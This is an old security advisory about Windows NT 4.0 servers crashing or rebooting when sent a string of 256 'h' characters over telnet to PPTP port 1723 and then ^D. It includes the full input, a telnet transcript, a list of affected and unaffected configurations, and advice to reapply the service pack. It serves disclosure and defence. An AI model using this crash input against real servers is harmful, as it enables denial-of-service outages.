COMMAND

    PPTP (depending on what?)

SYSTEMS AFFECTED

    WinNT

PROBLEM

    Simon Helson posted  following.  He  was playing around  with PPTP
    last night, and discovered  that, with "very" minimal  effort, one
    could  cause  NT  Server  (version  4,  service  pack 4) to reboot
    instantly, without shutting  down.  All  he did was  telnet to the
    port (1723) on the NT box, and then send the following data.

        hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
        hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
        hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
        hhhhhhhhhhhhhhhhhhhhhhhhhhhh
        (that's 256 'h's for those who don't want to count)

    and hit  return.   Nothing.   BUT, when  you hit  ^D and  all hell
    broke loose. The NT server  will drop like a stone,  full hardware
    reboot.  This  was tested multiple  times and always  got the same
    response, but  other testers  had positive  and negative  results.
    Didn't work:

        NT 4.0 SP4, RRAS - Chris Alliey
        NT 4.0 Server SP3, 128-bit, no RAS - Russ
        NT 4.0 Server SP3, PPTP3-fix, no RAS 128-bit - Russ
        NT 4.0 Server SP4, 128-bit, no RAS - Russ
        NT 4.0 Server SP4 - Lewman, Andrew
        NT 4.0 Server Enterprise, SP4 - Lewman, Andrew

    It worked:

        NT 4.0 SP4, Option Pack - Huang Min
        NT 4.0 Server, SP4, 40-bit, RAS - Simon Helson
        NT 4.0, SP3, RAS, PPTP (Proliant PPro 200, Netelligent  10/100
                ethernet, Compaq Fibre array) - Paul M. Hirsch
        NT 4.0,  SP3, 40-bit,  PPTP, RAS  (BSOD:   STOP 0x0000000A  in
                RASPPTPE.sys) - Martin Rex
        NT 4.0, SP4,  RAS, PPTP (RAS  & PPTP installed  after SP4, The
                problem disappeared  when SP4  was reinstalled  as per
                Microsoft's instructions) - Ronny Cook
        NT 4.0, SP3 (Machine freezes - dead mouse) - Emmanuel Tychon

    Originally, NT had following setup:

        NT Server Version 4, with Service Pack 4.0 applied.
        (outside US version - only 40 bit)
        PPTP added as a network device
        Number of VPNs available - 2
        then RAS service started.

    The attack box setup:

        RedHat Linux 5.2 running kernel 2.2.1
        modem connection to the net

    The procedure followed:

        [root@blobby /root]# telnet <removed for privacy> 1723
        Trying <removed for privacy>...
        Connected to <removed for privacy>.
        Escape character is '^]'
        hhhhhhhhhhhhhhh<type 256 times>
        ^d (not shown in output)
        ^]
        telnet> close
        Connection closed.

    The instant you hit ^d his server rebooted.

SOLUTION

    Hardware or device  driver error, or  maybe an issue  with RAS but
    not  RRAS?   It  seems  that  there  is  indeed  an issue here but
    reproducing it is difficult.  Anyway, as always - the golden  rule
    is, apply  the service  pack after  breathing on  your NT  server.
    With re-applied SP4 the vunrability disappeared.